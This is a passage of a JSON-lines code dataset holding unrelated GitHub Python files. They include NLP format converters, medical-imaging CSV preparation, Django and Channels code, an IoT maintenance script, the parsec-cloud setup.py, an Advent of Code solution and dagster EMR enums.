j[\"words\"]\n tags = j[\"pos\"]\n heads = j[\"predicted_heads\"]\n heads = list(map(str, heads))\n deps = j[\"predicted_dependencies\"]\n parsercolumns2conllu(args.out, tokens, tags, heads, deps, filemode=\"a\")\n if not lineflag:\n raise IOError(\n \"Empty file\"\n ) # we want to detect and subsequently delete empty files from the dataset.\n else:\n tokens = read_prediction_tokens(args.pred_file)\n tags, _ = read_prediction_tags(args.pred_file)\n heads, deps = read_prediction_dependencies(args.pred_file)\n parsercolumns2conllu(args.out, tokens, tags, heads, deps)\n\n\nif __name__ == \"__main__\":\n\n # parser for command line arguments\n arg_parser = argparse.ArgumentParser(\n description=\"\"\"Select whether it is tagger or parser output that will be converted to CoNLL-U format.\\n\n 1. tagger json2conllu: takes a tagger prediction file (json format) and writes a \n CoNLL-U file with the given columns.\\n\n 2. 
parser json2conllu: takes a parser prediction file (json format) and writes a \n CoNLL-U file with the given columns.\"\"\"\n )\n arg_parser.add_argument(\n \"-m\",\n \"--mode\",\n dest=\"mode\",\n choices=['tagger', 'parser'],\n required=True,\n help=\"\"\"Specify mode as described above. Choose one of the following: {tagger, parser}.\"\"\",\n )\n arg_parser.add_argument(\n \"-p\",\n \"--prediction\",\n metavar=\"PRED_FILE\",\n dest=\"pred_file\",\n required=True,\n help=\"\"\"Prediction file in json format. Output of AllenNLP tagger or parser.\"\"\",\n )\n arg_parser.add_argument(\n \"-o\",\n \"--output_file\",\n dest=\"out\",\n metavar=\"OUTPUT_FILE\",\n help=\"\"\"Path of the output file. Default is .conllu if not specified\"\"\",\n )\n arg_parser.add_argument(\n \"--multi\",\n dest=\"multi_mode\",\n const=True,\n default=False,\n action=\"store_const\",\n help=\"\"\"When specified, read multiple recipes in one document.\"\"\",\n )\n args = arg_parser.parse_args()\n\n args.debug = False\n\n # default output file name\n if args.out == None:\n args.out = str(args.pred_file)[:-4] + \"conllu\"\n\n #########################\n #### Start execution ####\n #########################\n\n if args.mode == \"tagger\":\n execute_tagger2c(args)\n elif args.mode == \"parser\":\n execute_parse2c(args)\n else:\n raise RuntimeError(\n \"Unexpected mode. Valid options are {tagger, parser}.\"\n )\n","repo_name":"interactive-cookbook/tagger-parser","sub_path":"data-scripts/json_to_conll.py","file_name":"json_to_conll.py","file_ext":"py","file_size_in_byte":11277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32791402665","text":"import pandas as pd \nimport glob\nimport random\nimport yaml\nimport os\nimport json\ndef create_dataset_csv(path_construct):\n path_list = { \"frames\": [], \"patient\": [], \"acquisition\": [],\"images_path\": [], \"annotations_path\": [], \"angio_loader_header\": []}\n # frame_list={\"frames\"}\n\n for patient in path_construct:\n #print (image)\n # x=os.path.join(image,r\"*\")\n\n x = glob.glob(os.path.join(patient, r\"*\"))\n # print (x)\n for acquisiton in x:\n img = os.path.join(acquisiton, \"frame_extractor_frames.npz\")\n annotations = os.path.join(acquisiton, \"clipping_points.json\")\n angio_leader = os.path.join(acquisiton, \"angio_loader_header.json\")\n with open(annotations) as f:\n clipping_points = json.load(f)\n\n for frame in clipping_points:\n frame_int = int(frame)\n\n path_list['images_path'].append(img)\n path_list['annotations_path'].append(annotations)\n path_list['frames'].append(frame_int)\n path_list['patient'].append(os.path.basename(patient))\n path_list['acquisition'].append(os.path.basename(acquisiton))\n path_list['angio_loader_header'].append(angio_leader)\n\n return path_list\n\ndef split_dataset(dataset_df, split_per, seed=1):\n \"\"\"Impartirea setului de date in antrenare, validare si testare in mod aleatoriu\n\n Args:\n dataset_df (pandas.DataFrame): contine caile catre imaginile de input si mastile de segmentare\n split_per (dict): un dictionare de forma {\"train\": float, \"valid\": float, \"test\": float} ce descrie\n procentajele pentru fiecare subset\n seed (int, optional): valoarea seed pentru reproducerea impartirii setului de date. 
Defaults to 1.\n \"\"\"\n # se amesteca aleatoriu indecsii DataFrame-ului\n # indexul este un numar (de cele mai multe ori) asociat fiecarui rand\n\n patients = dataset_df['patient'].unique()\n\n total = len(patients)\n\n random.seed(seed)\n random.shuffle(patients)\n\n # se impart indecsii in functie de procentele primite ca input\n train_idx = int(total * split_per[\"train\"])\n valid_idx = train_idx + int(total * split_per[\"valid\"])\n test_idx = train_idx + valid_idx + int(total * split_per[\"test\"])\n\n train_patients = patients[:train_idx]\n valid_patients = patients[train_idx:valid_idx]\n test_patients = patients[valid_idx:test_idx]\n\n dataset_df['subset'] = \"\"\n\n dataset_df.loc[dataset_df['patient'].isin(\n train_patients), 'subset'] = 'train'\n dataset_df.loc[dataset_df['patient'].isin(\n valid_patients), 'subset'] = 'valid'\n dataset_df.loc[dataset_df['patient'].isin(\n test_patients), 'subset'] = 'test'\n\n return dataset_df\n\n\n\ndef main ():\n \n # config = None\n # with open('config.yaml') as f: # reads .yml/.yaml files\n # config = yaml.safe_load(f)\n \n # path_construct = glob.glob(r'/media/cuda/HDD 1TB - DATE/AvesalonRazvanDate , Experimente/pacienti_11jan/*')\n \n # path_list = create_dataset_csv(path_construct)\n # dataset_df_pacienti_noi= pd.DataFrame(path_list)\n\n # dataset_df= split_dataset(dataset_df_pacienti_noi, split_per=config['data']['split_per'], seed=1)\n # print(dataset_df.head(3))\n # dataset_df.to_csv(config['data']['dataset_csv']) \n df1=pd.read_csv(r\"D:\\ai intro\\Angiografii\\PROIECT_ANGIOGRAFII\\CSV_angiografii_11.05.csv\")\n df2=pd.read_csv(r\"D:\\ai intro\\Angiografii\\PROIECT_ANGIOGRAFII\\CSV_angiografii_19.01.csv\")\n \n subset=df1.pop('subset')\n print (list(df1.columns))\n df1.insert(4,'subset',subset)\n\n \n \n result=df2.append(df1,ignore_index=True)\n \n result.pop('Unnamed: 0')\n \n \n result.to_csv(r\"D:\\ai intro\\Angiografii\\PROIECT_ANGIOGRAFII\\CSV_angiografii_date_adaugate.csv\")\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"RazvanAVESALON/PROIECT_ANGIOGRAFII","sub_path":"utils/csv_date_noi_generare.py","file_name":"csv_date_noi_generare.py","file_ext":"py","file_size_in_byte":3874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24296780784","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('userinfo', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='studentinfo',\n name='leschool',\n field=models.BooleanField(verbose_name='休学', default=False),\n ),\n ]\n","repo_name":"haominqu/pythoncrm","sub_path":"pythoncrm/userinfo/migrations/0002_studentinfo_leschool.py","file_name":"0002_studentinfo_leschool.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74984499047","text":"from PIL import Image\n\n#Objective:\n# Place image on screen and rapidly flip it so it appears \n# to be slashing a target.\n# Concatenate the second gif to the end of the image.\n#\n\noutput = []\n\n\nwith Image.open(\"georgesuo.png\") as img:\n\tfor x in range(5):\n\t\t#\n\t\tdelay = x*20\n\n\n\n\n\n\n\n\n\noutput[0].save('diesofgeorge.gif', save_all=True, append_images=output[1:], loop=0, 
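Worth flagging in `split_dataset` above: `test_idx` is computed as `train_idx + valid_idx + int(total * split_per["test"])`, which counts `train_idx` twice because it is already folded into `valid_idx`. Python slicing clamps the out-of-range bound, so the mistake is silent. A corrected sketch of the boundary arithmetic:

```python
import random

def split_indices(total, split_per, seed=1):
    """Return shuffled train/valid/test index lists for `total` patients."""
    order = list(range(total))
    random.seed(seed)
    random.shuffle(order)

    train_end = int(total * split_per["train"])
    valid_end = train_end + int(total * split_per["valid"])
    test_end = valid_end + int(total * split_per["test"])  # not train_end + valid_end + ...

    return order[:train_end], order[train_end:valid_end], order[valid_end:test_end]

# split_indices(10, {"train": 0.6, "valid": 0.2, "test": 0.2}) -> 6 / 2 / 2 indices
```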
disposal=2)","repo_name":"charredgrass/image-manip","sub_path":"diesofgeorge.py","file_name":"diesofgeorge.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6625097366","text":"import psycopg2\nimport pandas as pd\n# Connect to the PostgreSQL database\ntry:\n conn = psycopg2.connect(\n host=\"localhost\",\n database=\"IoTDataLake\",\n user=\"postgres\",\n password=\"\"\n )\nexcept Exception as e:\n print(\"Unable to connect to the database\")\n print(e)\n\n# Query the wind turbine data from the curated zone of the data lake\ntry:\n cur = conn.cursor()\n cur.execute(\"SELECT * FROM curatedzone.c_external_wind_turbine_data\")\n wind_turbine_data = pd.DataFrame(cur.fetchall(), columns=['id', 'rtc', 'year', 'month', 'day', 'hour', 'minute',\n 'temperature_100', 'temperature_120', 'temperature_80',\n 'wind_direction_100', 'wind_direction_120',\n 'wind_direction_80', 'wind_speed_100','wind_speed_120',\n 'wind_speed_80','pressure_200','pressure_100','pressure_0',\n 'power_output_80','power_output_100','power_output_120'])\n cur.close()\nexcept Exception as e:\n print(\"Unable to fetch wind turbine data\")\n print(e)\n\n# Define the threshold for power output\nthreshold = 2000\n\n# Calculate the moving average of the power output\nrolling_avg = wind_turbine_data['power_output_100'].rolling(window=24).mean()\n\n# Identify the time periods when the power output is below the threshold and the rolling average\nlow_power_periods = wind_turbine_data.loc[(wind_turbine_data['power_output_100'] < threshold) & (wind_turbine_data['power_output_100'] < rolling_avg)]\n\n# Calculate the duration of each low-power period\nlow_power_periods['Duration'] = (low_power_periods['rtc'] - low_power_periods['rtc'].shift())\n\n# Identify the time periods when maintenance should be performed\nmaintenance_periods = low_power_periods.loc[low_power_periods['Duration'] > pd.Timedelta('1 day')]\n\n# Compute the start and end times of the maintenance period\nmaint_start = maintenance_periods['rtc'].min()\nmaint_end = maintenance_periods['rtc'].min() + pd.Timedelta('6 hours')\n\n# Create a single maintenance record\nmaintenance_record = pd.DataFrame({\n 'maint_actual_start': [maint_start],\n 'maint_actual_end': [maint_end],\n 'maint_schedule_start': [maint_start + pd.Timedelta('1 day')],\n 'maint_schedule_end': [maint_end + pd.Timedelta('1 day')],\n 'reason': ['Preventive Maintenance'],\n 'vendor': ['ABC Company'],\n 'description': ['Inspect and clean the turbine blades'],\n 'assignee': ['John Doe'],\n 'status': ['Scheduled'],\n 'equipment_location': ['Turbine 1'],\n 'priority': ['High']\n})\n\n# Insert the maintenance record into the maintenance table\ntry:\n cur = conn.cursor()\n cur.execute(\"INSERT INTO maintenancezone.maintanence_rec (maint_schedule_start, maint_schedule_end, reason, vendor, description, assignee, status, equipment_location, priority) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s)\",\n (maintenance_record['maint_schedule_start'][0], maintenance_record['maint_schedule_end'][0], maintenance_record['reason'][0], maintenance_record['vendor'][0], maintenance_record['description'][0], maintenance_record['assignee'][0], maintenance_record['status'][0], maintenance_record['equipment_location'][0], maintenance_record['priority'][0]))\n # Commit\n conn.commit()\n print(\"Maintenance record inserted successfully\")\nexcept:\n print(\"Unable to insert maintenance record\")\nfinally:\n # Close the cursor and connection\n 
cur.close()\n conn.close()\n","repo_name":"bpbpublications/IoT-Data-Analytics-using-Python","sub_path":"Chapter 08/code/901_8.6.py","file_name":"901_8.6.py","file_ext":"py","file_size_in_byte":3634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17871368778","text":"from django.shortcuts import render\nfrom ipn.models.Message import Message\nfrom ipn.models.Lvc_Preliminary import Lvc_Preliminary\n\ndef get_message(request, id):\n message = Message.objects.get(id=id)\n related_lvc_data = Lvc_Preliminary.objects.filter(message_id=id).values()[0]\n\n context = {\n \"message\": message,\n \"lvc_data\": related_lvc_data\n }\n return render(request, \"message_detail.html\", context)\n\ndef get_messages(request):\n messages = Message.objects.all()\n context = {\n \"messages\": messages\n }\n return render(request, \"messages_index.html\", context)\n","repo_name":"lpsinger/interplanetary_network","sub_path":"ipn/views/messages.py","file_name":"messages.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73810284329","text":"import os\n\nfrom setuptools import setup, find_packages, distutils, Command\nfrom setuptools.command.build_py import build_py\n\n\n# Awesome hack to load `__version__`\n__version__ = None\nexec(open(\"parsec/_version.py\", encoding=\"utf-8\").read())\n\n\ndef fix_pyqt_import():\n # PyQt5-sip is a distinct pip package that provides PyQt5.sip\n # However it setuptools handles `setup_requires` by downloading the\n # dependencies in the `./.eggs` directory without really installing\n # them. This causes `import PyQt5.sip` to fail given the `PyQt5` folder\n # doesn't contains `sip.so` (or `sip.pyd` on windows)...\n import sys\n import glob\n import importlib\n\n for module_name, path_glob in (\n (\"PyQt5\", \".eggs/*PyQt5*/PyQt5/__init__.py\"),\n (\"PyQt5.sip\", \".eggs/*PyQt5_sip*/PyQt5/sip.*\"),\n ):\n # If the module has already been installed in the environment\n # setuptools won't populate the `.eggs` directory and we have\n # nothing to do\n try:\n importlib.import_module(module_name)\n except ImportError:\n pass\n else:\n continue\n\n for path in glob.glob(path_glob):\n\n spec = importlib.util.spec_from_file_location(module_name, path)\n if spec:\n module = importlib.util.module_from_spec(spec)\n sys.modules[module_name] = module\n break\n\n else:\n raise RuntimeError(\"Cannot found module `%s` in .eggs\" % module_name)\n\n\nclass GeneratePyQtResourcesBundle(Command):\n description = \"Generates `parsec.core.gui._resource_rc` bundle module\"\n\n user_options = []\n\n def initialize_options(self):\n pass\n\n def finalize_options(self):\n pass\n\n def run(self):\n fix_pyqt_import()\n try:\n from PyQt5.pyrcc_main import processResourceFile\n\n self.announce(\"Generating `parsec.core.gui._resources_rc`\", level=distutils.log.INFO)\n processResourceFile(\n [\"parsec/core/gui/rc/resources.qrc\"], \"parsec/core/gui/_resources_rc.py\", False\n )\n except ImportError:\n print(\"PyQt5 not installed, skipping `parsec.core.gui._resources_rc` generation.\")\n\n\nclass GenerateChangelog(Command):\n description = \"Convert HISTORY.rst to HTML\"\n\n user_options = []\n\n def initialize_options(self):\n pass\n\n def finalize_options(self):\n pass\n\n def run(self):\n import docutils.core\n\n destination_folder = \"parsec/core/gui/rc/generated_misc\"\n self.announce(\n f\"Converting HISTORY.rst to 
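The wind-turbine script above flags maintenance candidates where `power_output_100` falls below both a fixed threshold and its own 24-sample rolling mean (note that assigning the `Duration` column onto the filtered frame will trigger pandas' `SettingWithCopyWarning` unless a `.copy()` is taken first). The detection step in isolation, on synthetic data:

```python
import pandas as pd

# 30 healthy samples, a 10-sample dip, then recovery
power = pd.Series([2500] * 30 + [1200] * 10 + [2500] * 10, name="power_output_100")
rolling_avg = power.rolling(window=24).mean()

threshold = 2000
low_power = power[(power < threshold) & (power < rolling_avg)].index
print(low_power.min(), low_power.max())  # 30 39 -- exactly the simulated dip
```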
{destination_folder}/history.html\", level=distutils.log.INFO\n )\n os.makedirs(destination_folder, exist_ok=True)\n docutils.core.publish_file(\n source_path=\"HISTORY.rst\",\n destination_path=f\"{destination_folder}/history.html\",\n writer_name=\"html\",\n )\n\n\nclass GeneratePyQtForms(Command):\n description = \"Generates `parsec.core.ui.*` forms module\"\n\n user_options = []\n\n def initialize_options(self):\n pass\n\n def finalize_options(self):\n pass\n\n def run(self):\n import os\n import pathlib\n from collections import namedtuple\n\n fix_pyqt_import()\n try:\n from PyQt5.uic.driver import Driver\n except ImportError:\n print(\"PyQt5 not installed, skipping `parsec.core.gui.ui` generation.\")\n return\n\n self.announce(\"Generating `parsec.core.gui.ui`\", level=distutils.log.INFO)\n Options = namedtuple(\n \"Options\",\n [\"output\", \"import_from\", \"debug\", \"preview\", \"execute\", \"indent\", \"resource_suffix\"],\n )\n ui_dir = pathlib.Path(\"parsec/core/gui/forms\")\n ui_path = \"parsec/core/gui/ui\"\n os.makedirs(ui_path, exist_ok=True)\n for f in ui_dir.iterdir():\n o = Options(\n output=os.path.join(ui_path, \"{}.py\".format(f.stem)),\n import_from=\"parsec.core.gui\",\n debug=False,\n preview=False,\n execute=False,\n indent=4,\n resource_suffix=\"_rc\",\n )\n d = Driver(o, str(f))\n d.invoke()\n\n\nclass ExtractTranslations(Command):\n description = \"Extract translation strings\"\n\n user_options = []\n\n def initialize_options(self):\n pass\n\n def finalize_options(self):\n pass\n\n def run(self):\n import os\n import pathlib\n from unittest.mock import patch\n from babel.messages.frontend import CommandLineInterface\n\n fix_pyqt_import()\n try:\n from PyQt5.pylupdate_main import main as pylupdate_main\n except ImportError:\n print(\"PyQt5 not installed, skipping `parsec.core.gui.ui` generation.\")\n return\n\n self.announce(\"Generating ui translation files\", level=distutils.log.INFO)\n ui_dir = pathlib.Path(\"parsec/core/gui\")\n tr_dir = ui_dir / \"tr\"\n os.makedirs(tr_dir, exist_ok=True)\n\n new_args = [\"pylupdate\", str(ui_dir / \"parsec-gui.pro\")]\n with patch(\"sys.argv\", new_args):\n pylupdate_main()\n\n files = [str(f) for f in ui_dir.iterdir() if f.is_file() and f.suffix == \".py\"]\n files.sort()\n files.append(str(tr_dir / \"parsec_en.ts\"))\n args = [\n \"_\",\n \"extract\",\n \"-k\",\n \"translate\",\n \"-s\",\n \"--no-location\",\n \"-F\",\n \".babel.cfg\",\n \"--omit-header\",\n \"-o\",\n str(tr_dir / \"translation.pot\"),\n *files,\n ]\n CommandLineInterface().run(args)\n languages = [\"fr\", \"en\"]\n for lang in languages:\n po_file = tr_dir / f\"parsec_{lang}.po\"\n if not po_file.is_file():\n po_file.touch()\n args = [\n \"_\",\n \"update\",\n \"-i\",\n str(tr_dir / \"translation.pot\"),\n \"-o\",\n str(po_file),\n \"-l\",\n lang,\n ]\n CommandLineInterface().run(args)\n\n\nclass CompileTranslations(Command):\n description = \"Compile translations\"\n\n user_options = []\n\n def initialize_options(self):\n pass\n\n def finalize_options(self):\n pass\n\n def run(self):\n import os\n import pathlib\n from babel.messages.frontend import CommandLineInterface\n\n self.announce(\"Compiling ui translation files\", level=distutils.log.INFO)\n ui_dir = pathlib.Path(\"parsec/core/gui\")\n tr_dir = ui_dir / \"tr\"\n rc_dir = ui_dir / \"rc\" / \"translations\"\n os.makedirs(rc_dir, exist_ok=True)\n languages = [\"fr\", \"en\"]\n for lang in languages:\n args = [\n \"_\",\n \"compile\",\n \"-i\",\n str(tr_dir / f\"parsec_{lang}.po\"),\n \"-o\",\n 
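The setup script defines its build steps as `setuptools.Command` subclasses registered through `cmdclass`; the boilerplate pattern in miniature (the command name and message here are illustrative):

```python
from setuptools import Command

class HelloCommand(Command):
    """Runs as `python setup.py hello` once registered in cmdclass."""

    description = "print a greeting"
    user_options = []  # no --flags accepted

    def initialize_options(self):
        pass  # required hook, even when unused

    def finalize_options(self):
        pass  # required hook, even when unused

    def run(self):
        self.announce("hello from a custom command")

# setup(..., cmdclass={"hello": HelloCommand})
```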
str(rc_dir / f\"parsec_{lang}.mo\"),\n ]\n CommandLineInterface().run(args)\n\n\nclass build_py_with_pyqt(build_py):\n def run(self):\n self.run_command(\"generate_pyqt_forms\")\n self.run_command(\"compile_translations\")\n self.run_command(\"generate_changelog\")\n self.run_command(\"generate_pyqt_resources_bundle\")\n return super().run()\n\n\nclass build_py_with_pyqt_resource_bundle_generation(build_py):\n def run(self):\n self.run_command(\"generate_pyqt_resources_bundle\")\n return super().run()\n\n\nwith open(\"README.rst\") as readme_file:\n readme = readme_file.read()\n\nwith open(\"HISTORY.rst\") as history_file:\n history = history_file.read()\n\n\nrequirements = [\n \"attrs==19.2.0\",\n \"click==7.0\",\n \"msgpack==0.6.0\",\n \"wsproto==0.15.0\",\n \"h11==0.10.0\",\n # Can use marshmallow or the toasted flavour as you like ;-)\n # \"marshmallow==2.14.0\",\n \"toastedmarshmallow==0.2.6\",\n \"pendulum==2.1.2\",\n \"PyNaCl==1.4.0\",\n \"trio==0.16.0\",\n \"trio_typing==0.5.0\",\n \"async_generator>=1.9\",\n 'contextvars==2.1;python_version<\"3.7\"',\n \"sentry-sdk==0.14.3\",\n \"structlog==19.2.0\",\n \"importlib_resources==1.0.2\",\n \"colorama==0.4.0\", # structlog colored output\n \"async_exit_stack==1.0.1\",\n \"outcome==1.0.0\",\n \"packaging==20.4\",\n]\n\n\ntest_requirements = [\n \"pytest==5.4.3\",\n \"pytest-cov==2.10.0\",\n \"pytest-xdist==1.32.0\",\n \"pytest-trio==0.5.2\",\n \"pytest-qt==3.3.0\",\n \"pytest-rerunfailures==9.0\",\n \"hypothesis==5.3.0\",\n \"hypothesis-trio==0.5.0\",\n \"trustme==0.6.0\",\n # Winfsptest requirements\n # We can't use `winfspy[test]` because of some pip limitations\n # - see pip issues #7096/#6239/#4391/#988\n # Looking forward to the new pip dependency resolver!\n 'pywin32==227;platform_system==\"Windows\"',\n # Fix botocore and sphinx conflicting requirements on docutils\n \"docutils>=0.12,<0.16\",\n # Documentation generation requirements\n \"sphinx==2.4.3\",\n \"sphinx-intl==2.0.0\",\n \"sphinx-rtd-theme==0.4.3\",\n \"psutil==5.7.3\",\n]\n\n\nPYQT_DEPS = [\"PyQt5==5.14.2\", \"pyqt5-sip==12.8.0\"]\nBABEL_DEP = \"Babel==2.6.0\"\nWHEEL_DEP = \"wheel==0.34.2\"\nDOCUTILS_DEP = \"docutils==0.15\"\nextra_requirements = {\n \"core\": [\n *PYQT_DEPS,\n BABEL_DEP,\n 'fusepy==3.0.1;platform_system==\"Linux\" or platform_system==\"Darwin\"',\n 'winfspy==0.8.0;platform_system==\"Windows\"',\n \"zxcvbn==4.4.27\",\n 'psutil==5.7.3;platform_system==\"Windows\"',\n ],\n \"backend\": [\n \"jinja2==2.11.2\",\n # PostgreSQL\n \"triopg==0.6.0\",\n \"trio-asyncio==0.11.0\",\n # S3\n \"boto3==1.12.34\",\n \"botocore==1.15.34\",\n # Swift\n \"python-swiftclient==3.5.0\",\n \"pbr==4.0.2\",\n ],\n \"dev\": test_requirements,\n}\nextra_requirements[\"all\"] = sum(extra_requirements.values(), [])\nextra_requirements[\"oeuf-jambon-fromage\"] = extra_requirements[\"all\"]\n\nsetup(\n name=\"parsec-cloud\",\n version=__version__,\n description=\"Secure cloud framework\",\n long_description=readme + \"\\n\\n\" + history,\n author=\"Scille SAS\",\n author_email=\"contact@scille.fr\",\n url=\"https://github.com/Scille/parsec-cloud\",\n python_requires=\"~=3.6\",\n packages=find_packages(include=[\"parsec\", \"parsec.*\"]),\n package_dir={\"parsec\": \"parsec\"},\n setup_requires=[WHEEL_DEP, *PYQT_DEPS, BABEL_DEP, DOCUTILS_DEP], # To generate resources bundle\n install_requires=requirements,\n extras_require=extra_requirements,\n cmdclass={\n \"generate_pyqt_resources_bundle\": GeneratePyQtResourcesBundle,\n \"generate_changelog\": GenerateChangelog,\n 
\"generate_pyqt_forms\": GeneratePyQtForms,\n \"extract_translations\": ExtractTranslations,\n \"compile_translations\": CompileTranslations,\n \"generate_pyqt\": build_py_with_pyqt,\n \"build_py\": build_py_with_pyqt,\n },\n # Omitting GUI resources given they end up packaged in `parsec/core/gui/_resources_rc.py`\n package_data={\n \"parsec.backend.postgresql.migrations\": [\"*.sql\"],\n \"parsec.backend.templates\": [\"*\"],\n \"parsec.backend.static\": [\"*\"],\n \"parsec.core.resources\": [\"*.ico\", \"*.icns\", \"*.ignore\"],\n },\n entry_points={\n \"console_scripts\": [\"parsec = parsec.cli:cli\"],\n \"babel.extractors\": [\"extract_qt = misc.babel_qt_extractor.extract_qt\"],\n },\n license=\"AGPLv3\",\n zip_safe=False,\n keywords=\"parsec\",\n classifiers=[\n \"Development Status :: 5 - Production/Stable\",\n \"Intended Audience :: Developers\",\n \"Operating System :: POSIX :: Linux\",\n \"Operating System :: Microsoft :: Windows\",\n \"Operating System :: MacOS\",\n \"License :: OSI Approved :: GNU Affero General Public License v3 or later (AGPLv3+)\",\n \"Natural Language :: English\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n ],\n test_suite=\"tests\",\n tests_require=test_requirements,\n long_description_content_type=\"text/x-rst\",\n)\n","repo_name":"groumage/Parsec-TowardAMoreSecureCloud","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":12103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17711050152","text":"from channels.consumer import AsyncConsumer, StopConsumer\nfrom django.db import connection\n\n# from channels.generic.websocket import AsyncWebsocketConsumer\n\n\nclass ChatHotelConsumer(AsyncConsumer):\n\n async def websocket_connect(self, message):\n current_user = self.scope['user']\n\n currrent_tenant = self.scope['tenant'] #request.tenant\n \n print(current_user, \"websocket_connect current_user\")\n print(message, \"websocket_connect message\")\n\n print(currrent_tenant, \"currrent_tenant\")\n\n print(connection.schema_name, \"connection.schema_name\")\n\n await self.send({\"type\": \"websocket.accept\"})\n\n\n\n async def websocket_receive(self, message):\n \"\"\"\n Called when a WebSocket frame is received. 
Decodes it and passes it\n to receive().\n \"\"\"\n if \"text\" in message:\n await self.receive(text_data=message[\"text\"])\n else:\n await self.receive(bytes_data=message[\"bytes\"])\n\n async def receive(self, text_data=None, bytes_data=None):\n \"\"\"\n Called with a decoded WebSocket frame.\n \"\"\"\n if text_data:\n print(\"received text_data\", text_data)\n \n elif bytes_data:\n print(\"bytes_data received\", bytes_data)\n\n\n async def websocket_disconnect(self, message):\n\n print(\"websocket_disconnect\", message)\n raise StopConsumer()\n","repo_name":"Ngahu/dj_channels_x_dj_tenants","sub_path":"apps/tenant_apps/hotels/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34964632035","text":"import urllib.request\n\nwith open('input.txt') as file:\n input_array = [list(line.strip()) for line in file]\n gamma_rate = \"\"\n epsilon_rate = \"\"\n num_one = [0 for i in range(0, len(input_array[0]))]\n\n for i in range(0, len(input_array)):\n for j in range(0, len(input_array[i])):\n if int(input_array[i][j]) == 1:\n num_one[j] += 1\n else:\n num_one[j] -= 1\n\n for j in range(0, len(input_array[0])):\n if int(num_one[j]) >= 1:\n gamma_rate = gamma_rate + \"1\"\n epsilon_rate = epsilon_rate + \"0\"\n else:\n gamma_rate = gamma_rate + \"0\"\n epsilon_rate = epsilon_rate + \"1\"\n\ngamma_decimal = int(gamma_rate, 2)\nepsilon_decimal = int(epsilon_rate, 2)\n\nprint(gamma_decimal * epsilon_decimal)\n\n\n\n","repo_name":"zaragomes/AdventOfCode2021","sub_path":"day03/aoc3.1.py","file_name":"aoc3.1.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9891540157","text":"from enum import Enum as PyEnum\n\nfrom dagster import Enum, EnumValue\n\nEbsVolumeType = Enum(\n name=\"EbsVolumeType\", enum_values=[EnumValue(\"gp2\"), EnumValue(\"io1\"), EnumValue(\"standard\")]\n)\n\n\nclass EmrClusterState(PyEnum):\n \"\"\"Cluster state for EMR.\"\"\"\n\n Starting = \"STARTING\"\n Bootstrapping = \"BOOTSTRAPPING\"\n Running = \"RUNNING\"\n Waiting = \"WAITING\"\n Terminating = \"TERMINATING\"\n Terminated = \"TERMINATED\"\n TerminatedWithErrors = \"TERMINATED_WITH_ERRORS\"\n\n\nEMR_CLUSTER_TERMINATED_STATES = [\n EmrClusterState.Terminating,\n EmrClusterState.Terminated,\n EmrClusterState.TerminatedWithErrors,\n]\n\nEMR_CLUSTER_DONE_STATES = EMR_CLUSTER_TERMINATED_STATES + [EmrClusterState.Waiting]\n\n\nclass EmrStepState(PyEnum):\n \"\"\"Step state for EMR.\"\"\"\n\n Pending = \"PENDING\"\n Running = \"RUNNING\"\n Continue = \"CONTINUE\"\n Completed = \"COMPLETED\"\n Cancelled = \"CANCELLED\"\n Failed = \"FAILED\"\n Interrupted = \"INTERRUPTED\"\n\n\nEmrActionOnFailure = Enum(\n name=\"EmrActionOnFailure\",\n enum_values=[\n EnumValue(\"TERMINATE_JOB_FLOW\"),\n EnumValue(\"TERMINATE_CLUSTER\"),\n EnumValue(\"CANCEL_AND_WAIT\"),\n EnumValue(\"CONTINUE\"),\n ],\n)\n\nEmrAdjustmentType = Enum(\n name=\"EmrAdjustmentType\",\n enum_values=[\n EnumValue(\"CHANGE_IN_CAPACITY\"),\n EnumValue(\"PERCENT_CHANGE_IN_CAPACITY\"),\n EnumValue(\"EXACT_CAPACITY\"),\n ],\n)\n\nEmrComparisonOperator = Enum(\n name=\"EmrComparisonOperator\",\n enum_values=[\n EnumValue(\"GREATER_THAN_OR_EQUAL\"),\n EnumValue(\"GREATER_THAN\"),\n EnumValue(\"LESS_THAN\"),\n EnumValue(\"LESS_THAN_OR_EQUAL\"),\n ],\n)\n\nEmrInstanceRole = Enum(\n name=\"EmrInstanceRole\", 
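The Advent-of-Code solution above tallies each bit column with a +1/-1 counter (and its `urllib.request` import is unused). The same gamma/epsilon computation can be sketched more compactly by transposing the lines with `zip`, under the same one-binary-string-per-line input format:

```python
with open("input.txt") as f:
    lines = [line.strip() for line in f]

gamma_bits = ""
for column in zip(*lines):                    # transpose: one tuple per bit position
    ones = column.count("1")
    gamma_bits += "1" if ones > len(column) - ones else "0"

gamma = int(gamma_bits, 2)
epsilon = gamma ^ (2 ** len(gamma_bits) - 1)  # flip every bit within the width
print(gamma * epsilon)
```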
